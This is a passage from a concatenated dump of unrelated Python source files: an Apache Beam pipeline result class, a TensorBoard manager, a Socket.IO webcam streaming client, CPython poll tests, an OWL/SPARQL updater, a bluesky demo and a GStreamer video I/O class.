for x, y in zip(self.committed, self.attempted)
]
return {
self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges
}
class PipelineResult(runner.PipelineResult):
def __init__(
self,
job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks=()):
super().__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
self._job_service = job_service
self._job_id = job_id
self._messages = []
self._message_stream = message_stream
self._state_stream = state_stream
self._cleanup_callbacks = cleanup_callbacks
self._metrics = None
self._runtime_exception = None
def cancel(self):
# type: () -> None
try:
self._job_service.Cancel(
beam_job_api_pb2.CancelJobRequest(job_id=self._job_id))
finally:
self._cleanup()
@property
def state(self):
runner_api_state = self._job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
return self._state
@staticmethod
def _runner_api_state_to_pipeline_state(runner_api_state):
return getattr(
runner.PipelineState,
beam_job_api_pb2.JobState.Enum.Name(runner_api_state))
@staticmethod
def _pipeline_state_to_runner_api_state(pipeline_state):
return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)
def metrics(self):
if not self._metrics:
job_metrics_response = self._job_service.GetJobMetrics(
beam_job_api_pb2.GetJobMetricsRequest(job_id=self._job_id))
self._metrics = PortableMetrics(job_metrics_response)
return self._metrics
def _last_error_message(self):
# type: () -> str
# Filter only messages with the "message_response" and error messages.
messages = [
m.message_response for m in self._messages
if m.HasField('message_response')
]
error_messages = [
m for m in messages
if m.importance == beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR
]
if error_messages:
return error_messages[-1].message_text
else:
return 'unknown error'
def wait_until_finish(self, duration=None):
"""
:param duration: The maximum time in milliseconds to wait for the result of
the execution. If None or zero, will wait until the pipeline finishes.
:return: The result of the pipeline, i.e. PipelineResult.
"""
def read_messages():
# type: () -> None
previous_state = -1
for message in self._message_stream:
if message.HasField('message_response'):
logging.log(
MESSAGE_LOG_LEVELS[message.message_response.importance],
"%s",
message.message_response.message_text)
else:
current_state = message.state_response.state
if current_state != previous_state:
_LOGGER.info(
"Job state changed to %s",
self._runner_api_state_to_pipeline_state(current_state))
previous_state = current_state
self._messages.append(message)
message_thread = threading.Thread(
target=read_messages, name='wait_until_finish_read')
message_thread.daemon = True
message_thread.start()
if duration:
state_thread = threading.Thread(
target=functools.partial(self._observe_state, message_thread),
name='wait_until_finish_state_observer')
state_thread.daemon = True
state_thread.start()
start_time = time.time()
duration_secs = duration / 1000
while (time.time() - start_time < duration_secs and
state_thread.is_alive()):
time.sleep(1)
else:
self._observe_state(message_thread)
if self._runtime_exception:
raise self._runtime_exception
return self._state
def _observe_state(self, message_thread):
try:
for state_response in self._state_stream:
self._state = self._runner_api_state_to_pipeline_state(
state_response.state)
if state_response.state in TERMINAL_STATES:
# Wait for any last messages.
message_thread.join(10)
break
if self._state != runner.PipelineState.DONE:
self._runtime_exception = RuntimeError(
'Pipeline %s failed in state %s: %s' %
(self._job_id, self._state, self._last_error_message()))
except Exception as e:
self._runtime_exception = e
finally:
self._cleanup()
def _cleanup(self, on_exit=False):
# type: (bool) -> None
if on_exit and self._cleanup_callbacks:
_LOGGER.info(
'Running cleanup on exit. If your pipeline should continue running, '
'be sure to use the following syntax:\n'
' with Pipeline() as p:\n'
' p.apply(..)\n'
'This ensures that the pipeline finishes before this program exits.')
has_exception = None
for callback in self._cleanup_callbacks:
try:
callback()
except Exception:
has_exception = True
self._cleanup_callbacks = ()
if has_exception:
raise
|
tensorboard_manager.py
|
# -*- coding: utf-8 -*-
import os
import sys
import threading
import time
import itertools
from collections import namedtuple
import logging
sys.argv = ["tensorboard"]
from tensorboard.backend import application # noqa
try:
# Tensorboard 0.4.x series
from tensorboard import default
get_plugins = default.get_plugins
logging.debug("Tensorboard 0.4.x series detected")
except ImportError:
# Tensorboard 0.3.x series
from tensorboard.plugins.audio import audio_plugin
from tensorboard.plugins.core import core_plugin
from tensorboard.plugins.distribution import distributions_plugin
from tensorboard.plugins.graph import graphs_plugin
from tensorboard.plugins.histogram import histograms_plugin
from tensorboard.plugins.image import images_plugin
from tensorboard.plugins.profile import profile_plugin
from tensorboard.plugins.projector import projector_plugin
from tensorboard.plugins.scalar import scalars_plugin
from tensorboard.plugins.text import text_plugin
logging.debug("Tensorboard 0.3.x series detected")
def get_plugins():
return [
core_plugin.CorePlugin,
scalars_plugin.ScalarsPlugin,
images_plugin.ImagesPlugin,
audio_plugin.AudioPlugin,
graphs_plugin.GraphsPlugin,
distributions_plugin.DistributionsPlugin,
histograms_plugin.HistogramsPlugin,
projector_plugin.ProjectorPlugin,
text_plugin.TextPlugin,
profile_plugin.ProfilePlugin,
]
from .handlers import notebook_dir # noqa
TensorBoardInstance = namedtuple(
'TensorBoardInstance', ['name', 'logdir', 'tb_app', 'thread'])
def start_reloading_multiplexer(multiplexer, path_to_run, reload_interval):
def _ReloadForever():
current_thread = threading.currentThread()
while not current_thread.stop:
application.reload_multiplexer(multiplexer, path_to_run)
current_thread.reload_time = time.time()
time.sleep(reload_interval)
thread = threading.Thread(target=_ReloadForever)
thread.reload_time = None
thread.stop = False
thread.daemon = True
thread.start()
return thread
def TensorBoardWSGIApp(logdir, plugins, multiplexer,
reload_interval, path_prefix=""):
path_to_run = application.parse_event_files_spec(logdir)
if reload_interval:
thread = start_reloading_multiplexer(
multiplexer, path_to_run, reload_interval)
else:
application.reload_multiplexer(multiplexer, path_to_run)
thread = None
tb_app = application.TensorBoardWSGI(plugins)
manager.add_instance(logdir, tb_app, thread)
return tb_app
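# Monkey-patch TensorBoard's WSGI app factory so that
# application.standard_tensorboard_wsgi() (called from new_instance below)
# routes through the wrapper above, letting the manager record each instance
# and its reload thread.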
application.TensorBoardWSGIApp = TensorBoardWSGIApp
class TensorboardManger(dict):
def __init__(self):
self._logdir_dict = {}
def _next_available_name(self):
for n in itertools.count(start=1):
name = "%d" % n
if name not in self:
return name
def new_instance(self, logdir, reload_interval):
if not os.path.isabs(logdir) and notebook_dir:
logdir = os.path.join(notebook_dir, logdir)
if logdir not in self._logdir_dict:
purge_orphaned_data = True
plugins = get_plugins()
reload_interval = reload_interval or 30
application.standard_tensorboard_wsgi(
logdir=logdir, reload_interval=reload_interval,
purge_orphaned_data=purge_orphaned_data, plugins=plugins)
return self._logdir_dict[logdir]
def add_instance(self, logdir, tb_application, thread):
name = self._next_available_name()
instance = TensorBoardInstance(name, logdir, tb_application, thread)
self[name] = instance
self._logdir_dict[logdir] = instance
def terminate(self, name, force=True):
if name in self:
instance = self[name]
if instance.thread is not None:
instance.thread.stop = True
del self[name], self._logdir_dict[instance.logdir]
else:
raise Exception("There's no tensorboard instance named %s" % name)
manager = TensorboardManger()
|
camera.py
|
import cv2
import base64
from socketIO_client import SocketIO, BaseNamespace
import numpy as np
import time
from PIL import Image
from threading import Thread, ThreadError
import io
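# Receives base64-encoded JPEG frames pushed by the server on the '/live'
# Socket.IO namespace, shows them in an OpenCV window, and at the same time
# publishes frames from the local webcam back to the server ('livevideo' event).
# The server address below is an example LAN address.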
img_np = None
socketIO = SocketIO('http://192.168.0.102', 8020)
live_namespace = socketIO.define(BaseNamespace, '/live')
def receive_events_thread():
socketIO.wait()
def on_camera_response(*args):
global img_np
img_bytes = base64.b64decode(args[0]['data'])
img_np = np.array(Image.open(io.BytesIO(img_bytes)))
def run_cam():
global img_np
while True:
try:
cv2.imshow('cam',img_np)
if cv2.waitKey(30) & 0xFF == ord('q'):
break
except Exception:
# img_np is None until the first frame arrives; skip and retry
continue
live_namespace.on('camera_update', on_camera_response)
receive_events_thread = Thread(target=receive_events_thread)
receive_cam_thread = Thread(target=run_cam)
receive_events_thread.daemon = True
receive_events_thread.start()
receive_cam_thread.daemon = True
receive_cam_thread.start()
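# Publisher loop: grab a frame from the local webcam, convert BGR -> RGB,
# JPEG-encode it, base64-encode the bytes, and emit it on the 'livevideo'
# event roughly every 50 ms.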
cap = cv2.VideoCapture(0)
while True:
ret, img = cap.read()
img_b = cv2.imencode('.jpg', cv2.cvtColor(img, cv2.COLOR_BGR2RGB))[1].tobytes()
base64_bytes = base64.b64encode(img_b)
base64_string = base64_bytes.decode('utf-8')
live_namespace.emit('livevideo',{'data':base64_string})
time.sleep(0.05)
|
test_poll.py
|
# Test case for the os.poll() function
import os
import subprocess
import random
import select
import threading
import time
import unittest
from test.support import TESTFN, run_unittest, reap_threads, cpython_only
try:
select.poll
except AttributeError:
raise unittest.SkipTest("select.poll not defined")
def find_ready_matching(ready, flag):
match = []
for fd, mode in ready:
if mode & flag:
match.append(fd)
return match
class PollTests(unittest.TestCase):
def test_poll1(self):
# Basic functional test of poll object
# Create a bunch of pipe and test that poll works with them.
p = select.poll()
NUM_PIPES = 12
MSG = b" This is a test."
MSG_LEN = len(MSG)
readers = []
writers = []
r2w = {}
w2r = {}
for i in range(NUM_PIPES):
rd, wr = os.pipe()
p.register(rd)
p.modify(rd, select.POLLIN)
p.register(wr, select.POLLOUT)
readers.append(rd)
writers.append(wr)
r2w[rd] = wr
w2r[wr] = rd
bufs = []
while writers:
ready = p.poll()
ready_writers = find_ready_matching(ready, select.POLLOUT)
if not ready_writers:
raise RuntimeError("no pipes ready for writing")
wr = random.choice(ready_writers)
os.write(wr, MSG)
ready = p.poll()
ready_readers = find_ready_matching(ready, select.POLLIN)
if not ready_readers:
raise RuntimeError("no pipes ready for reading")
rd = random.choice(ready_readers)
buf = os.read(rd, MSG_LEN)
self.assertEqual(len(buf), MSG_LEN)
bufs.append(buf)
os.close(r2w[rd]); os.close(rd)
p.unregister(r2w[rd])
p.unregister(rd)
writers.remove(r2w[rd])
self.assertEqual(bufs, [MSG] * NUM_PIPES)
def test_poll_unit_tests(self):
# returns NVAL for invalid file descriptor
FD, w = os.pipe()
os.close(FD)
os.close(w)
p = select.poll()
p.register(FD)
r = p.poll()
self.assertEqual(r[0], (FD, select.POLLNVAL))
with open(TESTFN, 'w') as f:
fd = f.fileno()
p = select.poll()
p.register(f)
r = p.poll()
self.assertEqual(r[0][0], fd)
r = p.poll()
self.assertEqual(r[0], (fd, select.POLLNVAL))
os.unlink(TESTFN)
# type error for invalid arguments
p = select.poll()
self.assertRaises(TypeError, p.register, p)
self.assertRaises(TypeError, p.unregister, p)
# can't unregister non-existent object
p = select.poll()
self.assertRaises(KeyError, p.unregister, 3)
# Test error cases
pollster = select.poll()
class Nope:
pass
class Almost:
def fileno(self):
return 'fileno'
self.assertRaises(TypeError, pollster.register, Nope(), 0)
self.assertRaises(TypeError, pollster.register, Almost(), 0)
# Another test case for poll(). This is copied from the test case for
# select(), modified to use poll() instead.
def test_poll2(self):
cmd = 'for i in 0 1 2 3 4 5 6 7 8 9; do echo testing...; sleep 1; done'
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
bufsize=0)
proc.__enter__()
self.addCleanup(proc.__exit__, None, None, None)
p = proc.stdout
pollster = select.poll()
pollster.register( p, select.POLLIN )
for tout in (0, 1000, 2000, 4000, 8000, 16000) + (-1,)*10:
fdlist = pollster.poll(tout)
if (fdlist == []):
continue
fd, flags = fdlist[0]
if flags & select.POLLHUP:
line = p.readline()
if line != b"":
self.fail('error: pipe seems to be closed, but still returns data')
continue
elif flags & select.POLLIN:
line = p.readline()
if not line:
break
self.assertEqual(line, b'testing...\n')
continue
else:
self.fail('Unexpected return value from select.poll: %s' % fdlist)
def test_poll3(self):
# test int overflow
pollster = select.poll()
pollster.register(1)
self.assertRaises(OverflowError, pollster.poll, 1 << 64)
# Issues #15989, #17919
self.assertRaises(ValueError, pollster.register, 0, -1)
self.assertRaises(OverflowError, pollster.register, 0, 1 << 64)
self.assertRaises(ValueError, pollster.modify, 1, -1)
self.assertRaises(OverflowError, pollster.modify, 1, 1 << 64)
@cpython_only
def test_poll_c_limits(self):
from _testcapi import USHRT_MAX, INT_MAX, UINT_MAX
pollster = select.poll()
pollster.register(1)
# Issues #15989, #17919
self.assertRaises(OverflowError, pollster.register, 0, USHRT_MAX + 1)
self.assertRaises(OverflowError, pollster.modify, 1, USHRT_MAX + 1)
self.assertRaises(OverflowError, pollster.poll, INT_MAX + 1)
self.assertRaises(OverflowError, pollster.poll, UINT_MAX + 1)
@reap_threads
def test_threaded_poll(self):
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
rfds = []
for i in range(10):
fd = os.dup(r)
self.addCleanup(os.close, fd)
rfds.append(fd)
pollster = select.poll()
for fd in rfds:
pollster.register(fd, select.POLLIN)
t = threading.Thread(target=pollster.poll)
t.start()
try:
time.sleep(0.5)
# trigger ufds array reallocation
for fd in rfds:
pollster.unregister(fd)
pollster.register(w, select.POLLOUT)
self.assertRaises(RuntimeError, pollster.poll)
finally:
# and make the call to poll() from the thread return
os.write(w, b'spam')
t.join()
@unittest.skipUnless(threading, 'Threading required for this test.')
@reap_threads
def test_poll_blocks_with_negative_ms(self):
for timeout_ms in [None, -1000, -1, -1.0, -0.1, -1e-100]:
# Create two file descriptors. This will be used to unlock
# the blocking call to poll.poll inside the thread
r, w = os.pipe()
pollster = select.poll()
pollster.register(r, select.POLLIN)
poll_thread = threading.Thread(target=pollster.poll, args=(timeout_ms,))
poll_thread.start()
poll_thread.join(timeout=0.1)
self.assertTrue(poll_thread.is_alive())
# Write to the pipe so pollster.poll unblocks and the thread ends.
os.write(w, b'spam')
poll_thread.join()
self.assertFalse(poll_thread.is_alive())
os.close(r)
os.close(w)
def test_main():
run_unittest(PollTests)
if __name__ == '__main__':
test_main()
|
updateOWLfilesFromOutputs.py
|
import shutil
from multiprocessing import Process
import time
import rdflib
def prepareDataToUpdate():
taskList = []
with open('outputBusOPF.txt') as fileNow:
linesNow = fileNow.readlines()
for line in linesNow:
splittedLine = line.split('\t')
index = str('{0:03}'.format(int(splittedLine[0])))
busOutputMap = ['index',('V_PuVout_EBus-%s'%index),('V_thetaout_EBus-%s'%index),('V_Pout_EBus-%s'%index),('V_Qout_EBus-%s'%index)]
filename = '../' + ('EBus-%s'%index) + '.owl'
print('filename',filename)
attrPairForALine = []
for i in range(1,len(busOutputMap)):
IRI = filename + '#' + busOutputMap[i]
value = splittedLine[i] + ' (updated)'
attrPair = {'IRI': IRI, 'value': value}
attrPairForALine.append(attrPair)
taskList.append({'fileName': filename,'aLine': attrPairForALine})
# with open('outputBranchOPF.txt') as fileNow:
# linesNow = fileNow.readlines()
# for line in linesNow:
# splittedLine = line.split('\t')
# index = str('{0:03}'.format(int(splittedLine[0])))
# print('index -- ',index );
#stop = input('yo')
# branchOutputMap = ['index',('V_Ploss_MGDL-%s'%index),('V_Qloss_MGDL-%s'%index)]
# filename = ('MGDL-%s'%index) + '.owl'
# print('filename',filename)
# attrPairForALine = []
# for i in range(1,len(branchOutputMap)):
# IRI = filename + '#' + branchOutputMap[i]
# value = splittedLine[i] + ' (updated)'
# attrPair = {'IRI': IRI, 'value': value}
# attrPairForALine.append(attrPair)
# taskList.append({'fileName': filename,'aLine': attrPairForALine})
return taskList
def updateToFile(filename,attrPairForALine):
print('filename',filename)
print('attrPairForALine',attrPairForALine)
updates = []
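# For each attribute pair we queue a DELETE WHERE followed by an INSERT DATA so
# that the system:numericalValue triple of the target IRI is replaced in place;
# both updates are then applied to the local graph below.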
for attrPair in attrPairForALine:
targetIRI = attrPair['IRI']
value = attrPair['value']
deleteString = """PREFIX system: <http://www.theworldavatar.com/OntoCAPE/OntoCAPE/upper_level/system.owl#> DELETE WHERE { <http://www.theworldavatar.com/""" + targetIRI + """> system:numericalValue ?o .}"""
insertString = """PREFIX system: <http://www.theworldavatar.com/OntoCAPE/OntoCAPE/upper_level/system.owl#> INSERT DATA { <http://www.theworldavatar.com/""" + targetIRI + """> system:numericalValue '""" + value + """' .}"""
updates.append(deleteString)
updates.append(insertString)
localfilename = filename
g = rdflib.Graph()
g.load(localfilename)
for update in updates:
g.update(update)
g.serialize(destination='%s' %localfilename,format='pretty-xml')
print(filename)
if __name__ == "__main__": # confirms that the code is under main function
taskArray = prepareDataToUpdate()
procs = []
for task in taskArray:
proc = Process(target=updateToFile, args=(task['fileName'],task['aLine'],))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
|
demo.py
|
import logging
from multiprocessing import Process, Queue
from pathlib import Path
from suitcase.jsonl import Serializer
from bluesky import RunEngine
from ophyd.sim import det, det4, noisy_det, motor, motor1, motor2, img
from bluesky.plans import scan, count, grid_scan
from bluesky.preprocessors import SupplementalData
from event_model import RunRouter
import intake_bluesky.jsonl # noqa; to force intake registration
from ophyd.sim import SynSignal
import numpy as np
det.kind = 'hinted'
noisy_det.kind = 'hinted'
det4.kind = 'hinted'
log = logging.getLogger('bluesky_browser')
random_img = SynSignal(func=lambda: np.random.random((5, 10, 10)), name='random_img')
def generate_example_catalog(data_path):
data_path = Path(data_path)
def factory(name, doc):
serializer = Serializer(data_path / 'abc')
serializer('start', doc)
return [serializer], []
RE = RunEngine()
sd = SupplementalData()
RE.preprocessors.append(sd)
sd.baseline.extend([motor1, motor2])
rr = RunRouter([factory])
RE.subscribe(rr)
RE(count([det]))
RE(count([noisy_det], 5))
RE(scan([det], motor, -1, 1, 7))
RE(grid_scan([det4], motor1, -1, 1, 4, motor2, -1, 1, 7, False))
RE(scan([det], motor, -1, 1, motor2, -1, 1, 5))
RE(count([noisy_det, det], 5))
RE(count([random_img], 5))
RE(count([img], 5))
def factory(name, doc):
serializer = Serializer(data_path / 'xyz')
serializer('start', doc)
return [serializer], []
RE = RunEngine()
rr = RunRouter([factory])
RE.subscribe(rr)
RE(count([det], 3))
catalog_filepath = data_path / 'catalog.yml'
with open(catalog_filepath, 'w') as file:
file.write(f'''
plugins:
source:
- module: intake_bluesky
sources:
abc:
description: Some imaginary beamline
driver: intake_bluesky.jsonl.BlueskyJSONLCatalog
container: catalog
args:
paths: {Path(data_path) / 'abc' / '*.jsonl'}
handler_registry:
NPY_SEQ: ophyd.sim.NumpySeqHandler
metadata:
beamline: "00-ID"
xyz:
description: Some imaginary beamline
driver: intake_bluesky.jsonl.BlueskyJSONLCatalog
container: catalog
args:
paths: {Path(data_path) / 'xyz' / '*.jsonl'}
handler_registry:
NPY_SEQ: ophyd.sim.NumpySeqHandler
metadata:
beamline: "99-ID"
''')
return str(catalog_filepath)
def run_proxy(queue):
"""
Run Proxy on random, free ports and communicate the port numbers back.
"""
from bluesky.callbacks.zmq import Proxy
proxy = Proxy()
queue.put((proxy.in_port, proxy.out_port))
proxy.start()
def run_publisher(in_port, data_path):
"""
Acquire data in an infinite loop and publish it.
"""
import asyncio
from bluesky.callbacks.zmq import Publisher
from suitcase.jsonl import Serializer
from ophyd.sim import noisy_det, motor1, motor2
from bluesky.plans import count
from bluesky.preprocessors import SupplementalData
from bluesky.plan_stubs import sleep
publisher = Publisher(f'localhost:{in_port}')
RE = RunEngine(loop=asyncio.new_event_loop())
sd = SupplementalData()
RE.preprocessors.append(sd)
sd.baseline.extend([motor1, motor2])
RE.subscribe(publisher)
def factory(name, doc):
serializer = Serializer(data_path / 'abc')
serializer('start', doc)
return [serializer], []
rr = RunRouter([factory])
RE.subscribe(rr)
def infinite_plan():
while True:
yield from sleep(3)
yield from count([noisy_det], 20, delay=0.5)
yield from count([random_img], 10, delay=1)
try:
RE(infinite_plan())
finally:
RE.halt()
def stream_example_data(data_path):
data_path = Path(data_path)
log.debug(f"Serializing example data into directory {data_path!s}")
queue = Queue()
proxy_process = Process(target=run_proxy, args=(queue,))
proxy_process.start()
in_port, out_port = queue.get()
log.debug(f"Demo Proxy is listening on port {in_port} and publishing to {out_port}.")
publisher_process = Process(target=run_publisher, args=(in_port, data_path))
publisher_process.start()
log.debug("Demo acquisition has started.")
return f'localhost:{out_port}', proxy_process, publisher_process
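# A minimal consumer sketch (illustrative, not part of the original module): the
# address returned by stream_example_data can be handed to a bluesky
# RemoteDispatcher to receive the published documents.
#
#   from bluesky.callbacks.zmq import RemoteDispatcher
#   address, proxy_proc, publisher_proc = stream_example_data('example_data')
#   dispatcher = RemoteDispatcher(address)
#   dispatcher.subscribe(lambda name, doc: print(name))
#   dispatcher.start()  # blocks; run in a separate thread or process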
|
test_proxy.py
|
import threading
import websocket
import json
import time
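# Opens two WebSocket clients against a local proxy at ws://127.0.0.1:8765,
# authenticates each with placeholder API keys, subscribes to the 'T.TSLA'
# trade stream, and prints whatever each connection receives for ~10 seconds.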
def on_open(ws):
print("opened")
auth_data = {
"action": "authenticate",
"data": {"key_id": "INSERT_KEY", "secret_key": "INSERT_KEY"}
}
ws.send(json.dumps(auth_data))
listen_message = {"action": "listen", "data": {"streams": ["T.TSLA"]}}
ws.send(json.dumps(listen_message))
def on_message(ws, message):
print("WS 1: received a message")
print(message)
print()
def on_message2(ws, message):
print("WS 2: received a message")
print(message)
print()
def on_close(ws):
print("closed connection")
socket = "ws://127.0.0.1:8765"
# ws = websocket.WebSocketApp(socket, on_open=on_open,
# on_message=on_message, on_close=on_close)
ws = websocket.WebSocketApp(socket,
on_message=lambda ws, msg: on_message(ws,
msg),
on_close=lambda ws: on_close(ws),
on_open=lambda ws: on_open(ws))
ws2 = websocket.WebSocketApp(socket,
on_message=lambda ws, msg: on_message2(ws,
msg),
on_close=lambda ws: on_close(ws),
on_open=lambda ws: on_open(ws))
t1 = threading.Thread(target=ws.run_forever, args=())
t2 = threading.Thread(target=ws2.run_forever, args=())
t1.start()
t2.start()
time.sleep(10)
# threading.Thread has no kill(); closing the sockets makes run_forever return,
# after which the threads can be joined.
ws.close()
ws2.close()
t1.join()
t2.join()
print("joined")
|
videoio.py
|
from pathlib import Path
from enum import Enum
from collections import deque
from urllib.parse import urlparse
import subprocess
import threading
import logging
import cv2
logger = logging.getLogger(__name__)
# set up logging
LOG_PATH_GSTREAMER_CAPTURE = 'site/gstreamer_capture.log'
LOG_PATH_GSTREAMER_WRITE = 'site/gstreamer_write.log'
WITH_GSTREAMER = True
# https://docs.python.org/3/library/contextlib.html#contextlib.redirect_stdout
# Will try to redirect cv2 output to logger.
import os, contextlib
class Protocol(Enum):
IMAGE = 0
VIDEO = 1
CSI = 2
V4L2 = 3
RTSP = 4
HTTP = 5
RTMP = 6
MQTT = 7
WS = 8
class VideoIO:
def __init__(self, size, input_uri,
output_uri=None,
resolution=(1920, 1080),
frame_rate=30,
buffer_size=10,
proc_fps=30):
"""Class for video capturing and output saving.
Encoding, decoding, and scaling can be accelerated using the GStreamer backend.
Parameters
----------
size : tuple
Width and height of each frame to output.
input_uri : str
URI to input stream. It could be image sequence (e.g. '%06d.jpg'), video file (e.g. 'file.mp4'),
MIPI CSI camera (e.g. 'csi://0'), USB/V4L2 camera (e.g. '/dev/video0'),
RTSP stream (e.g. 'rtsp://<user>:<password>@<ip>:<port>/<path>'),
or HTTP live stream (e.g. 'http://<user>:<password>@<ip>:<port>/<path>')
        output_uri : str, optional
URI to an output video file.
resolution : tuple, optional
Original resolution of the input source.
Useful to set a certain capture mode of a USB/CSI camera.
frame_rate : int, optional
Frame rate of the input source.
Required if frame rate cannot be deduced, e.g. image sequence and/or RTSP.
Useful to set a certain capture mode of a USB/CSI camera.
buffer_size : int, optional
Number of frames to buffer.
            For live sources, a larger buffer drops fewer frames but increases latency.
proc_fps : int, optional
Estimated processing speed that may limit the capture interval `cap_dt`.
This depends on hardware and processing complexity.
"""
self.size = size
self.input_uri = input_uri
self.output_uri = output_uri
self.resolution = resolution
assert frame_rate > 0
self.frame_rate = frame_rate
assert buffer_size >= 1
self.buffer_size = buffer_size
assert proc_fps > 0
self.proc_fps = proc_fps
self.input_protocol = self._parse_uri(self.input_uri)
self.output_protocol = self._parse_uri(self.output_uri)
self.input_is_live = self.input_protocol != Protocol.IMAGE and self.input_protocol != Protocol.VIDEO
self.output_is_live = self.output_protocol != Protocol.IMAGE and self.output_protocol != Protocol.VIDEO
# TODO: https://blog.csdn.net/weixin_41099962/article/details/103097384
# TODO: https://forums.developer.nvidia.com/t/opencv-video-writer-to-gstreamer-appsrc/115567/20
# TODO: https://docs.opencv.org/3.4/d8/dfe/classcv_1_1VideoCapture.html
logger.debug("cv2.VideoCapture(str, int)")
with open(LOG_PATH_GSTREAMER_CAPTURE, 'a') as f:
with contextlib.redirect_stdout(f):
with contextlib.redirect_stderr(f):
if WITH_GSTREAMER:
self.source = cv2.VideoCapture(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
else:
self.source = cv2.VideoCapture(self.input_uri)
logger.debug("deque()")
self.frame_queue = deque([], maxlen=self.buffer_size)
self.cond = threading.Condition()
self.exit_event = threading.Event()
self.cap_thread = threading.Thread(target=self._capture_frames)
logger.debug("source.read()")
ret, frame = self.source.read()
if not ret:
raise RuntimeError('Unable to read video stream')
self.frame_queue.append(frame)
width = self.source.get(cv2.CAP_PROP_FRAME_WIDTH)
height = self.source.get(cv2.CAP_PROP_FRAME_HEIGHT)
self.cap_fps = self.source.get(cv2.CAP_PROP_FPS)
self.do_resize = (width, height) != self.size
if self.cap_fps == 0:
self.cap_fps = self.frame_rate # fallback to config if unknown
logger.info('%dx%d stream @ %d FPS', width, height, self.cap_fps)
if self.output_uri is not None:
#TODO: How to determine as file path?
if (self.output_protocol == Protocol.VIDEO):
Path(self.output_uri).parent.mkdir(parents=True, exist_ok=True)
output_fps = 1 / self.cap_dt
with open(LOG_PATH_GSTREAMER_WRITE, 'a') as f:
with contextlib.redirect_stdout(f):
with contextlib.redirect_stderr(f):
if WITH_GSTREAMER:
logger.debug("cv2.VideoWriter(): output_fps = %f", output_fps)
self.writer = cv2.VideoWriter(self._gst_write_pipeline(), cv2.CAP_GSTREAMER, 0,
output_fps, self.size, True)
else:
logger.debug("cv2.VideoWriter(): fourcc")
fourcc = cv2.VideoWriter_fourcc(*'avc1')
self.writer = cv2.VideoWriter(self.output_uri, fourcc, output_fps, self.size, True)
@property
def cap_dt(self):
# limit capture interval at processing latency for live sources
return 1 / min(self.cap_fps, self.proc_fps) if self.input_is_live else 1 / self.cap_fps
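    # Worked example (illustrative): for a live source with cap_fps=30 and
    # proc_fps=10, cap_dt = 1 / min(30, 10) = 0.1 s, so the derived output_fps
    # (1 / cap_dt) is 10; for a file with cap_fps=30, cap_dt stays at 1 / 30 s.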
    def start_capture(self):
        """Start capturing from file or device."""
        logger.debug("start_capture()")
if not self.source.isOpened():
self.source.open(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
if not self.cap_thread.is_alive():
self.cap_thread.start()
    def stop_capture(self):
        """Stop capturing from file or device."""
        logger.debug("stop_capture()")
with self.cond:
self.exit_event.set()
self.cond.notify()
self.frame_queue.clear()
self.cap_thread.join()
    def read(self):
        """Reads the next video frame.

        Returns
        -------
        ndarray
            Returns None if there are no more frames.
        """
        logger.debug("read()")
with self.cond:
while len(self.frame_queue) == 0 and not self.exit_event.is_set():
self.cond.wait()
if len(self.frame_queue) == 0 and self.exit_event.is_set():
return None
frame = self.frame_queue.popleft()
self.cond.notify()
if self.do_resize:
logger.debug("cv2.resize: %s", self.size)
frame = cv2.resize(frame, self.size)
return frame
    def write(self, frame):
        """Writes the next video frame."""
        logger.debug("write()")
assert hasattr(self, 'writer')
self.writer.write(frame)
    def release(self):
        """Cleans up input and output sources."""
        logger.debug("release()")
self.stop_capture()
if hasattr(self, 'writer'):
self.writer.release()
self.source.release()
def _gst_cap_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'nvvidconv' in gst_elements and self.input_protocol != Protocol.V4L2:
# format conversion for hardware decoder
# Note: detector accepts BGR only.
cvt_pipeline = (
'nvvidconv interpolation-method=5 ! videoconvert ! videorate ! '
'video/x-raw, width=%d, height=%d, framerate=%d/1, format=BGR ! ' #I420 / BGRx #Limited to 3 FPS for AI
'appsink sync=false' # sync=false
% (*self.size, self.frame_rate)
)
else:
cvt_pipeline = (
'videoscale ! '
'video/x-raw, width=%d, height=%d ! '
'videoconvert ! appsink sync=false'
% self.size
)
if self.input_protocol == Protocol.IMAGE:
pipeline = (
'multifilesrc location=%s index=1 caps="image/%s,framerate=%d/1" ! decodebin ! '
% (
self.input_uri,
self._img_format(self.input_uri),
self.frame_rate
)
)
elif self.input_protocol == Protocol.VIDEO:
pipeline = 'filesrc location=%s ! decodebin ! ' % self.input_uri
elif self.input_protocol == Protocol.CSI:
if 'nvarguscamerasrc' in gst_elements:
pipeline = (
'nvarguscamerasrc sensor_id=%s ! '
'video/x-raw(memory:NVMM), width=%d, height=%d, '
'format=NV12, framerate=%d/1 ! '
% (
self.input_uri[6:],
*self.resolution,
self.frame_rate
)
)
else:
raise RuntimeError('GStreamer CSI plugin not found')
elif self.input_protocol == Protocol.V4L2:
if 'v4l2src' in gst_elements:
pipeline = (
'v4l2src device=%s ! '
'video/x-raw, width=%d, height=%d, '
'format=YUY2, framerate=%d/1 ! '
% (
self.input_uri,
*self.resolution,
self.frame_rate
)
)
else:
raise RuntimeError('GStreamer V4L2 plugin not found')
elif self.input_protocol == Protocol.RTSP:
pipeline = (
'rtspsrc location=%s latency=0 ! '
'capsfilter caps=application/x-rtp,media=video ! decodebin ! ' % self.input_uri
)
elif self.input_protocol == Protocol.HTTP:
#HLS need dedicated plugin.
#https://stackoverflow.com/questions/31952067/is-there-a-way-of-detecting-the-end-of-an-hls-stream-with-javascript
#TODO: How about MPEG-DASH?
            pipeline = 'souphttpsrc location=%s %s ! hlsdemux ! decodebin ! ' % (self.input_uri, 'is-live=true' if self.input_is_live else '')
        else:
            raise RuntimeError('Unsupported input protocol: %s' % self.input_protocol)
logger.debug("GSTREAMER INPUT: %s", pipeline + cvt_pipeline)
return pipeline + cvt_pipeline
def _gst_write_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
        video_codec = 'I420' if self.output_protocol == Protocol.RTMP else 'RGBA'
